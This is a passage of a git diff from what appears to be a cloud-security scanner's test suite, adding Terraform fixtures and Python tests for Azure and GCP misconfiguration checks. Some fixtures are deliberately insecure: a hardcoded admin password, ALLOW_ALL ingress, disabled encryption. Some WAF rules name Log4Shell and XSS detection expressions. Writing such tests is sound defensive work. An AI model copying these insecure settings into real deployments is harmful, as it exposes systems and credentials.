+  name                = ""
+  resource_group_name = ""
+
+  dynamic "ssl_policy" {
+    for_each = var.ssl_policy == null ? [] : [1]
+    content {
+      disabled_protocols   = lookup(var.ssl_policy, "disabled_protocols", [])
+      policy_type          = lookup(var.ssl_policy, "policy_type", "Predefined")
+      policy_name          = lookup(var.ssl_policy, "policy_type") == "Predefined" ? lookup(var.ssl_policy, "policy_name", "AppGwSslPolicy20170401S") : null
+      cipher_suites        = lookup(var.ssl_policy, "cipher_suites", [])
+      min_protocol_version = lookup(var.ssl_policy, "min_protocol_version", null)
+    }
+  }
 }
\ No newline at end of file
diff --git a/tests/terraform/checks/resource/azure/example_AppGWDefinesSecureProtocols/terraform.auto.tfvars b/tests/terraform/checks/resource/azure/example_AppGWDefinesSecureProtocols/terraform.auto.tfvars
new file mode 100644
index 00000000000..4ba62139de4
--- /dev/null
+++ b/tests/terraform/checks/resource/azure/example_AppGWDefinesSecureProtocols/terraform.auto.tfvars
@@ -0,0 +1,9 @@
+ssl_policy = {
+  disabled_protocols = []
+  policy_type        = "Custom"
+  cipher_suites = [
+    "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256",
+    "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384",
+  ]
+  min_protocol_version = "TLSv1_2"
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/resource/azure/example_AppGWDefinesSecureProtocols/variables.tf b/tests/terraform/checks/resource/azure/example_AppGWDefinesSecureProtocols/variables.tf
new file mode 100644
index 00000000000..84eda3c5c59
--- /dev/null
+++ b/tests/terraform/checks/resource/azure/example_AppGWDefinesSecureProtocols/variables.tf
@@ -0,0 +1,6 @@
+variable "ssl_policy" {
+  description = "bla bla"
+  type        = any
+  default     = {}
+}
+
diff --git a/tests/terraform/checks/resource/azure/example_AppServiceDotnetFrameworkVersion/main.tf b/tests/terraform/checks/resource/azure/example_AppServiceDotnetFrameworkVersion/main.tf
index f63e4acf95e..ea888fe46da 100644
--- a/tests/terraform/checks/resource/azure/example_AppServiceDotnetFrameworkVersion/main.tf
+++ b/tests/terraform/checks/resource/azure/example_AppServiceDotnetFrameworkVersion/main.tf
@@ -74,7 +74,7 @@ resource "azurerm_windows_web_app" "pass" {
     http2_enabled     = true
     health_check_path = var.health_check_path
     application_stack {
-      dotnet_version = "v7.0"
+      dotnet_version = "v8.0"
     }
   }
 
diff --git a/tests/terraform/checks/resource/azure/example_AzureSparkPoolIsolatedComputeEnabled/main.tf b/tests/terraform/checks/resource/azure/example_AzureSparkPoolIsolatedComputeEnabled/main.tf
new file mode 100644
index 00000000000..dbbe54522b0
--- /dev/null
+++ b/tests/terraform/checks/resource/azure/example_AzureSparkPoolIsolatedComputeEnabled/main.tf
@@ -0,0 +1,22 @@
+## SHOULD PASS: Explicit true
+resource "azurerm_synapse_spark_pool" "pass" {
+  name                = "sparkPool1"
+  resource_group_name = azurerm_resource_group.rg.name
+  location            = azurerm_resource_group.rg.location
+  compute_isolation_enabled       = true
+}
+
+## SHOULD FAIL: Default false
+resource "azurerm_synapse_spark_pool" "fail" {
+  name                = "sparkPool1"
+  resource_group_name = azurerm_resource_group.rg.name
+  location            = azurerm_resource_group.rg.location
+}
+
+## SHOULD FAIL: Explicit false
+resource "azurerm_synapse_spark_pool" "fail2" {
+  name                = "sparkPool1"
+  resource_group_name = azurerm_resource_group.rg.name
+  location            = azurerm_resource_group.rg.location
+  compute_isolation_enabled       = false
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/resource/azure/example_CognitiveServicesConfigureIdentity/main.tf b/tests/terraform/checks/resource/azure/example_CognitiveServicesConfigureIdentity/main.tf
new file mode 100644
index 00000000000..ef86d981dd3
--- /dev/null
+++ b/tests/terraform/checks/resource/azure/example_CognitiveServicesConfigureIdentity/main.tf
@@ -0,0 +1,28 @@
+resource "azurerm_cognitive_account" "pass" {
+  name                = "example-account"
+  location            = azurerm_resource_group.example.location
+  resource_group_name = azurerm_resource_group.example.name
+  kind                = "Face"
+  identity {
+    type = "a"
+  }
+  sku_name = "S0"
+
+  tags = {
+    Acceptance = "Test"
+  }
+}
+
+resource "azurerm_cognitive_account" "fail" {
+  name                = "example-account"
+  location            = azurerm_resource_group.example.location
+  resource_group_name = azurerm_resource_group.example.name
+  kind                = "Face"
+  local_auth_enabled = true
+
+  sku_name = "S0"
+
+  tags = {
+    Acceptance = "Test"
+  }
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/resource/azure/example_CognitiveServicesEnableLocalAuth/main.tf b/tests/terraform/checks/resource/azure/example_CognitiveServicesEnableLocalAuth/main.tf
new file mode 100644
index 00000000000..bd6a97baa0e
--- /dev/null
+++ b/tests/terraform/checks/resource/azure/example_CognitiveServicesEnableLocalAuth/main.tf
@@ -0,0 +1,40 @@
+resource "azurerm_cognitive_account" "fail" {
+  name                = "example-account"
+  location            = azurerm_resource_group.example.location
+  resource_group_name = azurerm_resource_group.example.name
+  kind                = "Face"
+
+  sku_name = "S0"
+
+  tags = {
+    Acceptance = "Test"
+  }
+}
+
+resource "azurerm_cognitive_account" "fail2" {
+  name                = "example-account"
+  location            = azurerm_resource_group.example.location
+  resource_group_name = azurerm_resource_group.example.name
+  kind                = "Face"
+  local_auth_enabled = true
+
+  sku_name = "S0"
+
+  tags = {
+    Acceptance = "Test"
+  }
+}
+
+resource "azurerm_cognitive_account" "pass" {
+  name                = "example-account"
+  location            = azurerm_resource_group.example.location
+  resource_group_name = azurerm_resource_group.example.name
+  kind                = "Face"
+  local_auth_enabled = false
+
+  sku_name = "S0"
+
+  tags = {
+    Acceptance = "Test"
+  }
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/resource/azure/example_KeyVaultDisablesPublicNetworkAccess/main.tf b/tests/terraform/checks/resource/azure/example_KeyVaultDisablesPublicNetworkAccess/main.tf
index 32231d38b6f..07733b1fb74 100644
--- a/tests/terraform/checks/resource/azure/example_KeyVaultDisablesPublicNetworkAccess/main.tf
+++ b/tests/terraform/checks/resource/azure/example_KeyVaultDisablesPublicNetworkAccess/main.tf
@@ -123,6 +123,22 @@ resource "azurerm_key_vault" "pass4" {
   }
 }
 
+resource "azurerm_key_vault" "pass5" {
+  name                                   = "examplepass5"
+  location                               = azurerm_resource_group.example.location
+  resource_group_name                    = azurerm_resource_group.example.name
+  enabled_for_disk_encryption            = true
+  tenant_id                              = data.azurerm_client_config.current.tenant_id
+  soft_delete_retention_days             = 90
+  purge_protection_enabled               = enabled
+  sku_name                               = "standard"
+  network_acls {
+    default_action = "Allow"
+    bypass         = "AzureServices"
+    virtual_network_subnet_ids = ["127.0.0.1/24"]
+  }
+}
+
 resource "azurerm_key_vault" "fail1" {
   name                                   = "examplefail1"
   location                               = azurerm_resource_group.example.location
@@ -259,7 +275,7 @@ resource "azurerm_key_vault" "fail5" {
       default_action             = "Allow"
       bypass                     = "AzureServices"
       ip_rules                   = []
-      virtual_network_subnet_ids = var.subnet_ids
+      virtual_network_subnet_ids = []
     }
   }
 }
diff --git a/tests/terraform/checks/resource/azure/example_SynapseSQLPoolDataEncryption/main.tf b/tests/terraform/checks/resource/azure/example_SynapseSQLPoolDataEncryption/main.tf
new file mode 100644
index 00000000000..103e03e2b1a
--- /dev/null
+++ b/tests/terraform/checks/resource/azure/example_SynapseSQLPoolDataEncryption/main.tf
@@ -0,0 +1,42 @@
+resource "azurerm_resource_group" "example" {
+  name     = "example-resources"
+  location = "West Europe"
+}
+
+resource "azurerm_synapse_workspace" "azurerm_synapse_workspace_example" {
+  name                                 = "MyAzureSynapseWorkspace"
+  resource_group_name                  = azurerm_resource_group.example.name
+  location                             = azurerm_resource_group.example.location
+  storage_data_lake_gen2_filesystem_id = azurerm_storage_data_lake_gen2_filesystem.example.id
+  sql_administrator_login              = "sqladminuser"
+
+  identity {
+    type = "SystemAssigned"
+  }
+}
+
+resource "azurerm_synapse_sql_pool" "azurerm_synapse_sql_pool_pass" {
+  name                 = "examplesqlpool"
+  data_encrypted       = true
+  synapse_workspace_id = azurerm_synapse_workspace.azurerm_synapse_workspace_example.id
+  sku_name             = "DW100c"
+  create_mode          = "Default"
+  storage_account_type = "GRS"
+}
+
+resource "azurerm_synapse_sql_pool" "azurerm_synapse_sql_pool_fail_A" {
+  name                 = "examplesqlpool"
+  data_encrypted       = false
+  synapse_workspace_id = azurerm_synapse_workspace.azurerm_synapse_workspace_example.id
+  sku_name             = "DW100c"
+  create_mode          = "Default"
+  storage_account_type = "GRS"
+}
+
+resource "azurerm_synapse_sql_pool" "azurerm_synapse_sql_pool_fail_B" {
+  name                 = "examplesqlpool"
+  synapse_workspace_id = azurerm_synapse_workspace.azurerm_synapse_workspace_example.id
+  sku_name             = "DW100c"
+  create_mode          = "Default"
+  storage_account_type = "GRS"
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/resource/azure/example_SynapseWorkspaceAdministratorLoginPasswordHidden/main.tf b/tests/terraform/checks/resource/azure/example_SynapseWorkspaceAdministratorLoginPasswordHidden/main.tf
new file mode 100644
index 00000000000..0940abf6fe3
--- /dev/null
+++ b/tests/terraform/checks/resource/azure/example_SynapseWorkspaceAdministratorLoginPasswordHidden/main.tf
@@ -0,0 +1,29 @@
+resource "azurerm_resource_group" "example" {
+  name     = "example-resources"
+  location = "West Europe"
+}
+
+resource "azurerm_synapse_workspace" "azurerm_synapse_workspace_pass" {
+  name                                 = "MyAzureSynapseWorkspace"
+  resource_group_name                  = azurerm_resource_group.example.name
+  location                             = azurerm_resource_group.example.location
+  storage_data_lake_gen2_filesystem_id = azurerm_storage_data_lake_gen2_filesystem.example.id
+  sql_administrator_login              = "sqladminuser"
+
+  identity {
+    type = "SystemAssigned"
+  }
+}
+
+resource "azurerm_synapse_workspace" "azurerm_synapse_workspace_fail" {
+  name                                 = "MyAzureSynapseWorkspace"
+  resource_group_name                  = azurerm_resource_group.example.name
+  location                             = azurerm_resource_group.example.location
+  storage_data_lake_gen2_filesystem_id = azurerm_storage_data_lake_gen2_filesystem.example.id
+  sql_administrator_login              = "sqladminuser"
+  sql_administrator_login_password     = "H@Sh1CoR3!"
+
+  identity {
+    type = "SystemAssigned"
+  }
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/resource/azure/example_SynapseWorkspaceCMKEncryption/main.tf b/tests/terraform/checks/resource/azure/example_SynapseWorkspaceCMKEncryption/main.tf
new file mode 100644
index 00000000000..2697f498733
--- /dev/null
+++ b/tests/terraform/checks/resource/azure/example_SynapseWorkspaceCMKEncryption/main.tf
@@ -0,0 +1,34 @@
+resource "azurerm_resource_group" "example" {
+  name     = "example-resources"
+  location = "West Europe"
+}
+
+resource "azurerm_synapse_workspace" "azurerm_synapse_workspace_pass" {
+  name                                 = "MyAzureSynapseWorkspace"
+  resource_group_name                  = azurerm_resource_group.example.name
+  location                             = azurerm_resource_group.example.location
+  storage_data_lake_gen2_filesystem_id = azurerm_storage_data_lake_gen2_filesystem.example.id
+  sql_administrator_login              = "sqladminuser"
+  sql_administrator_login_password     = "H@Sh1CoR3!"
+  customer_managed_key {
+    key_versionless_id = azurerm_key_vault_key.example.versionless_id
+    key_name           = "enckey"
+  }
+
+  identity {
+    type = "SystemAssigned"
+  }
+}
+
+resource "azurerm_synapse_workspace" "azurerm_synapse_workspace_fail" {
+  name                                 = "MyAzureSynapseWorkspace"
+  resource_group_name                  = azurerm_resource_group.example.name
+  location                             = azurerm_resource_group.example.location
+  storage_data_lake_gen2_filesystem_id = azurerm_storage_data_lake_gen2_filesystem.example.id
+  sql_administrator_login              = "sqladminuser"
+  sql_administrator_login_password     = "H@Sh1CoR3!"
+
+  identity {
+    type = "SystemAssigned"
+  }
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/resource/azure/test_ACRDedicatedDataEndpointEnabled.py b/tests/terraform/checks/resource/azure/test_ACRDedicatedDataEndpointEnabled.py
new file mode 100644
index 00000000000..3f4f8daa750
--- /dev/null
+++ b/tests/terraform/checks/resource/azure/test_ACRDedicatedDataEndpointEnabled.py
@@ -0,0 +1,42 @@
+import os
+import unittest
+
+from checkov.runner_filter import RunnerFilter
+from checkov.terraform.runner import Runner
+from checkov.terraform.checks.resource.azure.ACRDedicatedDataEndpointEnabled import check
+
+
+class TestACRDedicatedDataEndpointEnabled(unittest.TestCase):
+
+    def test(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = os.path.join(current_dir, "example_ACRDedicatedDataEndpointEnabled")
+        report = runner.run(root_folder=test_files_dir,
+                            runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        passing_resources = {
+            'azurerm_container_registry.pass',
+        }
+        failing_resources = {
+            'azurerm_container_registry.fail',
+            'azurerm_container_registry.fail2'
+        }
+        skipped_resources = {}
+
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+        failed_check_resources = set([c.resource for c in report.failed_checks])
+
+        self.assertEqual(summary['passed'], len(passing_resources))
+        self.assertEqual(summary['failed'], len(failing_resources))
+        self.assertEqual(summary['skipped'], len(skipped_resources))
+        self.assertEqual(summary['parsing_errors'], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == '__main__':
+    unittest.main()
\ No newline at end of file
diff --git a/tests/terraform/checks/resource/azure/test_AppGWDefinesSecureProtocols.py b/tests/terraform/checks/resource/azure/test_AppGWDefinesSecureProtocols.py
index 85af0fa7925..ede203d4b7a 100644
--- a/tests/terraform/checks/resource/azure/test_AppGWDefinesSecureProtocols.py
+++ b/tests/terraform/checks/resource/azure/test_AppGWDefinesSecureProtocols.py
@@ -19,7 +19,8 @@ def test(self):
 
         passing_resources = {
             'azurerm_application_gateway.pass',
-            'azurerm_application_gateway.pass2'
+            'azurerm_application_gateway.pass2',
+            'azurerm_application_gateway.pass_dynamic_bug'
         }
         failing_resources = {
             'azurerm_application_gateway.fail',
diff --git a/tests/terraform/checks/resource/azure/test_AzureSparkPoolIsolatedComputeEnabled.py b/tests/terraform/checks/resource/azure/test_AzureSparkPoolIsolatedComputeEnabled.py
new file mode 100644
index 00000000000..7bfb90660d7
--- /dev/null
+++ b/tests/terraform/checks/resource/azure/test_AzureSparkPoolIsolatedComputeEnabled.py
@@ -0,0 +1,43 @@
+import logging
+import os
+import unittest
+
+from checkov.runner_filter import RunnerFilter
+from checkov.terraform.runner import Runner
+from checkov.terraform.checks.resource.azure.AzureSparkPoolIsolatedComputeEnabled import check
+
+class TestAzureSparkPoolIsolatedComputeEnabled(unittest.TestCase):
+
+    def test(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = os.path.join(current_dir, "example_AzureSparkPoolIsolatedComputeEnabled")
+        report = runner.run(root_folder=test_files_dir,
+                            runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+        logging.warning(f"summary: {summary}")
+
+        passing_resources = {
+            'azurerm_synapse_spark_pool.pass'
+        }
+        failing_resources = {
+            'azurerm_synapse_spark_pool.fail',
+            'azurerm_synapse_spark_pool.fail2'
+        }
+        skipped_resources = {}
+
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+        failed_check_resources = set([c.resource for c in report.failed_checks])
+
+        self.assertEqual(summary['passed'], len(passing_resources))
+        self.assertEqual(summary['failed'], len(failing_resources))
+        self.assertEqual(summary['skipped'], len(skipped_resources))
+        self.assertEqual(summary['parsing_errors'], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == '__main__':
+    unittest.main()
\ No newline at end of file
diff --git a/tests/terraform/checks/resource/gcp/test_GKEBasicAuth.py b/tests/terraform/checks/resource/azure/test_CognitiveServicesConfigureIdentity.py
similarity index 51%
rename from tests/terraform/checks/resource/gcp/test_GKEBasicAuth.py
rename to tests/terraform/checks/resource/azure/test_CognitiveServicesConfigureIdentity.py
index 938a752b31c..4f3eaf13d7f 100644
--- a/tests/terraform/checks/resource/gcp/test_GKEBasicAuth.py
+++ b/tests/terraform/checks/resource/azure/test_CognitiveServicesConfigureIdentity.py
@@ -1,38 +1,36 @@
 import unittest
 from pathlib import Path
 
-from checkov.terraform.checks.resource.gcp.GKEBasicAuth import check
 from checkov.runner_filter import RunnerFilter
+from checkov.terraform.checks.resource.azure.CognitiveServicesConfigureIdentity import check
 from checkov.terraform.runner import Runner
 
 
-class TestGKEBinaryAuthorization(unittest.TestCase):
+class TestCognitiveServicesConfigureIdentity(unittest.TestCase):
     def test(self):
-        test_files_dir = Path(__file__).parent / "example_GKEBasicAuth"
+        test_files_dir = Path(__file__).parent / "example_CognitiveServicesConfigureIdentity"
+
         report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
         summary = report.get_summary()
 
         passing_resources = {
-            'google_container_cluster.pass',
-            'google_container_cluster.pass2',
-            'google_container_cluster.pass3',
+            "azurerm_cognitive_account.pass",
         }
         failing_resources = {
-            'google_container_cluster.fail',
-            'google_container_cluster.fail2',
+            "azurerm_cognitive_account.fail",
         }
 
         passed_check_resources = {c.resource for c in report.passed_checks}
         failed_check_resources = {c.resource for c in report.failed_checks}
 
-        self.assertEqual(summary['passed'], 3)
-        self.assertEqual(summary['failed'], 2)
-        self.assertEqual(summary['skipped'], 0)
-        self.assertEqual(summary['parsing_errors'], 0)
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
 
         self.assertEqual(passing_resources, passed_check_resources)
         self.assertEqual(failing_resources, failed_check_resources)
 
 
-if __name__ == '__main__':
+if __name__ == "__main__":
     unittest.main()
\ No newline at end of file
diff --git a/tests/terraform/checks/resource/azure/test_CognitiveServicesEnableLocalAuth.py b/tests/terraform/checks/resource/azure/test_CognitiveServicesEnableLocalAuth.py
new file mode 100644
index 00000000000..713f6474692
--- /dev/null
+++ b/tests/terraform/checks/resource/azure/test_CognitiveServicesEnableLocalAuth.py
@@ -0,0 +1,38 @@
+import unittest
+from pathlib import Path
+
+from checkov.runner_filter import RunnerFilter
+from checkov.terraform.checks.resource.azure.CognitiveServicesEnableLocalAuth import check
+from checkov.terraform.runner import Runner
+
+
+class TestCognitiveServicesEnableLocalAuth(unittest.TestCase):
+    def test(self):
+        test_files_dir = Path(__file__).parent / "example_CognitiveServicesEnableLocalAuth"
+
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        passing_resources = {
+            "azurerm_cognitive_account.pass",
+        }
+        failing_resources = {
+            "azurerm_cognitive_account.fail",
+            "azurerm_cognitive_account.fail2",
+
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/terraform/checks/resource/azure/test_KeyVaultDisablesPublicNetworkAccess.py b/tests/terraform/checks/resource/azure/test_KeyVaultDisablesPublicNetworkAccess.py
index 003714318ef..b35eb03a0dd 100644
--- a/tests/terraform/checks/resource/azure/test_KeyVaultDisablesPublicNetworkAccess.py
+++ b/tests/terraform/checks/resource/azure/test_KeyVaultDisablesPublicNetworkAccess.py
@@ -21,7 +21,8 @@ def test(self):
             'azurerm_key_vault.pass1',
             'azurerm_key_vault.pass2',
             'azurerm_key_vault.pass3',
-            'azurerm_key_vault.pass4'
+            'azurerm_key_vault.pass4',
+            'azurerm_key_vault.pass5'
         }
         failing_resources = {
             'azurerm_key_vault.fail1',
diff --git a/tests/terraform/checks/resource/azure/test_SynapseSQLPoolDataEncryption.py b/tests/terraform/checks/resource/azure/test_SynapseSQLPoolDataEncryption.py
new file mode 100644
index 00000000000..36136f78db2
--- /dev/null
+++ b/tests/terraform/checks/resource/azure/test_SynapseSQLPoolDataEncryption.py
@@ -0,0 +1,41 @@
+import os
+import unittest
+
+from checkov.runner_filter import RunnerFilter
+from checkov.terraform.checks.resource.azure.SynapseSQLPoolDataEncryption import check
+from checkov.terraform.runner import Runner
+
+
+class TestSynapseSQLPoolDataEncryption(unittest.TestCase):
+    def test(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = current_dir + "/example_SynapseSQLPoolDataEncryption"
+        report = runner.run(
+            root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id])
+        )
+        summary = report.get_summary()
+
+        passing_resources = {
+            "azurerm_synapse_sql_pool.azurerm_synapse_sql_pool_pass",
+        }
+        failing_resources = {
+            "azurerm_synapse_sql_pool.azurerm_synapse_sql_pool_fail_A",
+            "azurerm_synapse_sql_pool.azurerm_synapse_sql_pool_fail_B",
+        }
+
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+        failed_check_resources = set([c.resource for c in report.failed_checks])
+
+        self.assertEqual(summary["passed"], 1)
+        self.assertEqual(summary["failed"], 2)
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
\ No newline at end of file
diff --git a/tests/terraform/checks/resource/azure/test_SynapseWorkspaceAdministratorLoginPasswordHidden.py b/tests/terraform/checks/resource/azure/test_SynapseWorkspaceAdministratorLoginPasswordHidden.py
new file mode 100644
index 00000000000..a4e212386ee
--- /dev/null
+++ b/tests/terraform/checks/resource/azure/test_SynapseWorkspaceAdministratorLoginPasswordHidden.py
@@ -0,0 +1,39 @@
+import os
+import unittest
+
+from checkov.runner_filter import RunnerFilter
+from checkov.terraform.checks.resource.azure.SynapseWorkspaceAdministratorLoginPasswordHidden import check
+from checkov.terraform.runner import Runner
+
+class TestSynapseWorkspaceAdministratorLoginPasswordHidden(unittest.TestCase):
+    def test(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = current_dir + "/example_SynapseWorkspaceAdministratorLoginPasswordHidden"
+        report = runner.run(
+            root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id])
+        )
+        summary = report.get_summary()
+
+        passing_resources = {
+            "azurerm_synapse_workspace.azurerm_synapse_workspace_pass",
+        }
+        failing_resources = {
+            "azurerm_synapse_workspace.azurerm_synapse_workspace_fail",
+        }
+
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+        failed_check_resources = set([c.resource for c in report.failed_checks])
+
+        self.assertEqual(summary["passed"], 1)
+        self.assertEqual(summary["failed"], 1)
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/terraform/checks/resource/azure/test_SynapseWorkspaceCMKEncryption.py b/tests/terraform/checks/resource/azure/test_SynapseWorkspaceCMKEncryption.py
new file mode 100644
index 00000000000..d19ff9d8bf2
--- /dev/null
+++ b/tests/terraform/checks/resource/azure/test_SynapseWorkspaceCMKEncryption.py
@@ -0,0 +1,40 @@
+import os
+import unittest
+
+from checkov.runner_filter import RunnerFilter
+from checkov.terraform.checks.resource.azure.SynapseWorkspaceCMKEncryption import check
+from checkov.terraform.runner import Runner
+
+
+class TestSynapseWorkspaceCMKEncryption(unittest.TestCase):
+    def test(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = current_dir + "/example_SynapseWorkspaceCMKEncryption"
+        report = runner.run(
+            root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id])
+        )
+        summary = report.get_summary()
+
+        passing_resources = {
+            "azurerm_synapse_workspace.azurerm_synapse_workspace_pass",
+        }
+        failing_resources = {
+            "azurerm_synapse_workspace.azurerm_synapse_workspace_fail",
+        }
+
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+        failed_check_resources = set([c.resource for c in report.failed_checks])
+
+        self.assertEqual(summary["passed"], 1)
+        self.assertEqual(summary["failed"], 1)
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/terraform/checks/resource/gcp/example_CloudArmorWAFACLCVE202144228/main.tf b/tests/terraform/checks/resource/gcp/example_CloudArmorWAFACLCVE202144228/main.tf
index 48c91dcaff0..890108edf67 100644
--- a/tests/terraform/checks/resource/gcp/example_CloudArmorWAFACLCVE202144228/main.tf
+++ b/tests/terraform/checks/resource/gcp/example_CloudArmorWAFACLCVE202144228/main.tf
@@ -28,6 +28,21 @@ resource "google_compute_security_policy" "enabled_deny_404" {
   }
 }
 
+resource "google_compute_security_policy" "pass_preconfigwaf" {
+  name = "example"
+
+  rule {
+    action   = "deny(403)"
+    priority = 1
+    match {
+      expr {
+        expression = "evaluatePreconfiguredWaf('cve-canary')"
+        # expression = "evaluatePreconfiguredExpr('cve-canary')"
+      }
+    }
+  }
+}
+
 # fail
 
 resource "google_compute_security_policy" "allow" {
@@ -72,3 +87,18 @@ resource "google_compute_security_policy" "different_expr" {
     }
   }
 }
+
+resource "google_compute_security_policy" "pass_preconfigwaf" {
+  name = "example"
+
+  rule {
+    action   = "deny(403)"
+    priority = 1
+    match {
+      expr {
+        expression = "evaluatePreconfiguredWaf('xss-canary')"
+        # expression = "evaluatePreconfiguredExpr('xss-canary')"
+      }
+    }
+  }
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/resource/gcp/example_CloudFunctionPermissiveIngress/main.tf b/tests/terraform/checks/resource/gcp/example_CloudFunctionPermissiveIngress/main.tf
new file mode 100644
index 00000000000..3fb1a01f4af
--- /dev/null
+++ b/tests/terraform/checks/resource/gcp/example_CloudFunctionPermissiveIngress/main.tf
@@ -0,0 +1,98 @@
+resource "google_cloudfunctions2_function" "pass1" {
+  name = "gcf-function"
+  location = "us-central1"
+  description = "a new function"
+
+  service_config {
+    max_instance_count  = 3
+    min_instance_count = 1
+    available_memory    = "4Gi"
+    timeout_seconds     = 60
+    max_instance_request_concurrency = 80
+    available_cpu = "4"
+    environment_variables = {
+        SERVICE_CONFIG_TEST = "config_test"
+    }
+    ingress_settings = "ALLOW_INTERNAL_ONLY"
+    all_traffic_on_latest_revision = true
+    service_account_email = google_service_account.account.email
+  }
+}
+
+resource "google_cloudfunctions2_function" "fail1" {
+  name = "gcf-function"
+  location = "us-central1"
+  description = "a new function"
+
+  service_config {
+    max_instance_count  = 3
+    min_instance_count = 1
+    available_memory    = "4Gi"
+    timeout_seconds     = 60
+    max_instance_request_concurrency = 80
+    available_cpu = "4"
+    environment_variables = {
+        SERVICE_CONFIG_TEST = "config_test"
+    }
+    ingress_settings = "ALLOW_ALL"
+    all_traffic_on_latest_revision = true
+    service_account_email = google_service_account.account.email
+  }
+}
+
+# Defaults to ALLOW_ALL (https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/cloudfunctions2_function#ingress_settings)
+resource "google_cloudfunctions2_function" "fail2_not_specified" {
+  name = "gcf-function"
+  location = "us-central1"
+  description = "a new function"
+
+  service_config {
+    max_instance_count  = 3
+    min_instance_count = 1
+    available_memory    = "4Gi"
+    timeout_seconds     = 60
+    max_instance_request_concurrency = 80
+    available_cpu = "4"
+    environment_variables = {
+        SERVICE_CONFIG_TEST = "config_test"
+    }
+    all_traffic_on_latest_revision = true
+    service_account_email = google_service_account.account.email
+  }
+}
+
+resource "google_cloudfunctions_function" "pass2" {
+  name                  = "serverless-lb-test-function"
+  region                = "europe-west1"
+  description           = "serverless-lb-test-function"
+  available_memory_mb   = 512
+  source_archive_bucket = google_storage_bucket.lb-zip.name
+  source_archive_object = google_storage_bucket_object.lb-zip.name
+  timeout               = 60
+  service_account_email = google_service_account.serverless.email
+  labels = {
+    deployment-tool = "console-cloud"
+  }
+  entry_point           = "hello_get"
+  runtime               = "python37"
+  trigger_http = true
+  ingress_settings = "ALLOW_INTERNAL_AND_GCLB"
+}
+
+resource "google_cloudfunctions_function" "fail3" {
+  name                  = "serverless-lb-test-function"
+  region                = "europe-west1"
+  description           = "serverless-lb-test-function"
+  available_memory_mb   = 512
+  source_archive_bucket = google_storage_bucket.lb-zip.name
+  source_archive_object = google_storage_bucket_object.lb-zip.name
+  timeout               = 60
+  service_account_email = google_service_account.serverless.email
+  labels = {
+    deployment-tool = "console-cloud"
+  }
+  entry_point           = "hello_get"
+  runtime               = "python37"
+  trigger_http = true
+  ingress_settings = "ALLOW_ALL"
+}
diff --git a/tests/terraform/checks/resource/gcp/example_GKEBasicAuth/main.tf b/tests/terraform/checks/resource/gcp/example_GKEBasicAuth/main.tf
deleted file mode 100644
index 1a8504e54d6..00000000000
--- a/tests/terraform/checks/resource/gcp/example_GKEBasicAuth/main.tf
+++ /dev/null
@@ -1,73 +0,0 @@
-
-resource "google_container_cluster" "fail2" {
-  name               = "marcellus-wallace"
-  location           = "us-central1-a"
-  initial_node_count = 3
-
-  master_auth {
-    username = ""
-
-    client_certificate_config {
-      issue_client_certificate = false
-    }
-  }
-
-  timeouts {
-    create = "30m"
-    update = "40m"
-  }
-}
-
-resource "google_container_cluster" "fail" {
-  name               = "google_cluster_bad"
-  monitoring_service = "none"
